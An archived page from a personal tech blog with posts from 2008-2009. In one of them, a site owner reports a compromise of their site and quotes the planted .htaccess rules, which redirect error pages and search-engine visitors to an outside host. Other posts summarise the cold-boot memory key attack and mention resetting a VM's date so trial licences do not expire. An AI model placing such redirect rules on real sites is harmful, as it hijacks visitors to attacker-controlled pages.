Archive for the Category » Technical «

Sunday, July 26th, 2009 | Author:

It’s been a while since my last entry. A few things was happening, my blog engine went kaput a few weeks ago and it actually affected my Google ranking. 🙁 I saw a significant drop search engine directed traffic.

Recently I discovered some malicious activity on my other web host. I was going through my gallery, http://jiehong.net/gallery when after a few clicks, I got re-directed to ask.com. I thought I haven’t renew my subscription or my domain hosting.

After checking my subscriptions, all is fine. I went into cPanel to poke around. What can cause re-directions, I check the re-directions settings, sub-domains etc. Finally I discover some re-directing codes in some of my .htaccess.

Sample:

ErrorDocument 400 http://ake.kz/in.cgi?8
ErrorDocument 401 http://ake.kz/in.cgi?8
ErrorDocument 403 http://ake.kz/in.cgi?8
ErrorDocument 404 http://ake.kz/in.cgi?8
ErrorDocument 500 http://ake.kz/in.cgi?8

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*
RewriteRule ^(.*)$ http://ake.kz/in.cgi?7 [R=301,L]

I discovered a folder was created in my public_html, “coming10/almost”. What’s almost, the hacking is almost done ?
I found the following files inside
– .htaccess
– doing83.html
– er404.php
– everyting40php
– thanks28.html

They all contain encoded javascript to redirect visitors to some site. MY VISITORS ! I reported to my web host, I wonder how much action can they take. They are using ClamAV to scan the /home. Oh well… I’m expecting somebody eye-balling the logs to determine the source of entry.

Now I still do not know how they got in, so I need to monitor my site very closely.


Category: Security, Technical  | Tags: , , ,  | One Comment
Sunday, November 02nd, 2008 | Author:

The older version of CPanel version 10 does not have the option for changing to PHP5. So what you need to do is to add the following line to your .htaccess file.

“AddType application/x-httpd-php5 .php”

Category: Technical  | Tags: , ,  | Leave a Comment
Sunday, October 19th, 2008 | Author:

I just read this article on using compressed air to cool a memory chip so it will retain data even power is been cut off.

A video can be found here on the process and on why colder memory chip will retain data longer. By retaining the data, you can do a dump of the data and extract the cryptographic keys. They were able to extract keys for BitLocker, TrueCrypt, FileVault and dm-crypt.

The attack is not exploiting weakness of the encryption software but due to the fact that the keys have to be stored in memory. Encrypting the key in memory don’t really help, you still need to store that key that encrypts somewhere !

Category: Security, Systems  | Tags: ,  | Leave a Comment
Sunday, October 05th, 2008 | Author:

My story on why I decided to change the phone lock timeout.

When I first power on my HTC Touch Pro, I went through the start up wizard, it prompt me to set a phone lock pin and a timeout for activating the lock. I decided to go with 15mins, since I can change it later.

I decided to configure an Exchange profile on my Touch Pro for my office emails, since I have a Mobile Broadband plan with a 50GB data limit.

more…

Tuesday, September 30th, 2008 | Author:

Now, this is interesting for you iPhone folks. Check Point is providing IPsec VPN client for iPhone.

Link

Wednesday, April 30th, 2008 | Author:

Well, most Singaporeans are pretty crippled recently due to a law suit between Singapore Land Authority and Virtual Maps, thus the mapping service from www.streetdirectory.com is not available currently.

So when I was at Auckland for a firewall deployment, the customer was showing his Blackberry with an mapping application, Mgmaps or Mobile Gmaps. He’s using it with a built-in GPS and the best part is, the maps are stored in his memory card. Offline browsing !

more…

Category: Mobiles, Technical  | Tags: , ,  | 2 Comments
Wednesday, April 16th, 2008 | Author:

Right, I’m slow with this SIP VOIP stuff. When I subscribed to Pfingo SIP service, I was searching high and low for the client for UIQ3, since Sony Ericsson P1 is supported.

more…

Category: Mobiles, Technical  | Tags: , , ,  | Leave a Comment
Thursday, March 20th, 2008 | Author:

I was looking for a way to force my VM to boot up with a specific date and time without going into the VM BIOS to change it every time I boot up.

I just need a VM for testing and evaluating certain software or platforms but I don’t like re-building it when the licenses expires.

Especially when trial software always expires in like 15 or 30 days ? 7 for a particular secure os and 15 for a particular secure platform. 🙂

more…

Category: Systems, Technical  | Tags: ,  | Leave a Comment
Tuesday, January 08th, 2008 | Author:

Well, if you have some DVDs that you will like to backup, here are the steps to do it.

Note: For non-encrypted DVDs, meaning like personal home videos, non-commerical created DVDs, etc.. 🙂

Step 1:

dvdbackup -M -i /dev/dvd -o ./outputdir/

-M tells it to make a full backup, there are other parameters to backup selective chapters.

dvdbackup will create the DVD folder structure under ./outputdir/<volume-name>

Step 2:

mkisofs -dvd-video -o dvd.iso ./outputdir/<volume-name>

Category: Linux, Technical  | Tags: ,  | Leave a Comment
Thursday, January 03rd, 2008 | Author:

If you installed Back Track 2 into your hdd and if you want to update the aircrack-ng suite, here’s the commands to do so.

more…

Category: Linux, Security, Technical  | Tags: ,  | Leave a Comment